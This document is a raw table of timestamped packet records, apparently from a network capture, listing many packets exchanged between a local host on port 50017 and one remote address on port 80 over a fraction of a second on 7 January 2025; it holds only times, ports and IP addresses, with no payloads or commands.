Jan 7, 2025 10:09:04.927804947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927812099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927824020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927834034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927845955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927851915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927851915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927898884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955054045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955113888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955137014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955153942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955163956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955166101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955178976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955193043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955207109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955235958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955245018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955245018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955250025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955264091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955302000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955322027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955333948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955339909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955339909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955382109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955389023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955404043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955415010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955432892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955445051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955445051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955467939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955490112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955492020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955517054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955529928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955540895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955542088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955573082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955585003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955590010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.955598116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.955656052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.978264093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978370905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978369951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.978400946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978414059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978425980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978431940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978437901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.978509903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.010999918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011075974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011087894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011090040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011120081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011132002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011149883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011168957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011181116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011181116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011187077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011198997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011209011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011219978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011228085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011240005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011270046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011281967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011296988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011310101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011324883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011337996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011337996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011410952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011414051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011424065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011435032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011445999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011501074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011508942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011511087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011523008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011559010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011579037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011590958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011600971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011605024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011666059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011759996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011770010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011780024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011791945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011801958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011811972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011822939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011837959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011838913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011869907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011873960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011888027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011898041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011909008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011928082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011929035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011941910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011949062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.011971951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.011997938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013387918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013422966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013433933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013452053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013467073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013482094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013492107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013519049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013525009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013525009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013546944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013556957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013561010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013602972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013629913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013665915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013681889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013685942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013705969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013731956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013741016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013744116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013756990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013765097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013793945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013793945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013813019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013823986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013827085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013849974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013864040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013874054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013875961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013902903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013915062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.013937950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013957024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.013998032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014008045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014020920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014035940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014039993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014094114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014097929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014118910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014126062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014131069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014144897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014162064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014183998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014183998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014205933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014236927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014267921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014277935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014291048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014317989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014329910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014358044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014364004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014364004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014372110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014384031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014415979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014415979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014463902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014476061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014487028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014497995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014508963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014518976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014519930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014537096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014564991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014692068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014702082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014714003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014724016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014734983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014744997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014750004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014758110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014764071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014770985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014782906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014791012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014795065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.014822960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.014837980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.041842937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041857004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041867018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041878939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041903019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041909933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.041915894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041948080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.041965008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041991949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.041997910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042011023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042021036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042026997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042033911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042062998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042067051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042092085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042103052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042103052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042110920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042141914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042148113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042149067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042156935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042166948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042177916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042217970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042227983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042248011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042248011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042263031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042275906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042289019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042327881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042339087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042350054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.042382956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.042382956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.065006018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065052986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065064907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065093040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.065125942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065138102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065151930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065152884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.065162897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065176964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.065191031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.065211058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.065236092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.097975969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098001957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098014116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098025084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098037004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098062038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098079920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098081112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098092079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098107100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098117113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098144054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098160982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098167896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098180056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098191977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098203897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098237991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098237991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098253965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098264933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098277092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098288059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098331928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098340034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098351002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098361969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098371983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098397970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098412037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098500013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098511934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098522902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098532915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098539114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098563910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098578930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098591089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098598957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098603010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098614931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098625898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098647118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098663092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098767996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098784924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098795891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098804951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098817110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098825932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.098841906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.098879099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100383043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100394964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100419998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100431919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100442886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100459099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100459099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100466013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100478888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100516081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100516081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100516081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100539923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100550890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100558996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100565910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100590944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100595951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100595951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100605011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100617886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100624084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100625038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100630999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100641012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100642920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100675106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100677967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100708008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100719929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100734949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100734949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100754023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100771904 CET	50017	80	192.168.2.4	31.41.244.11
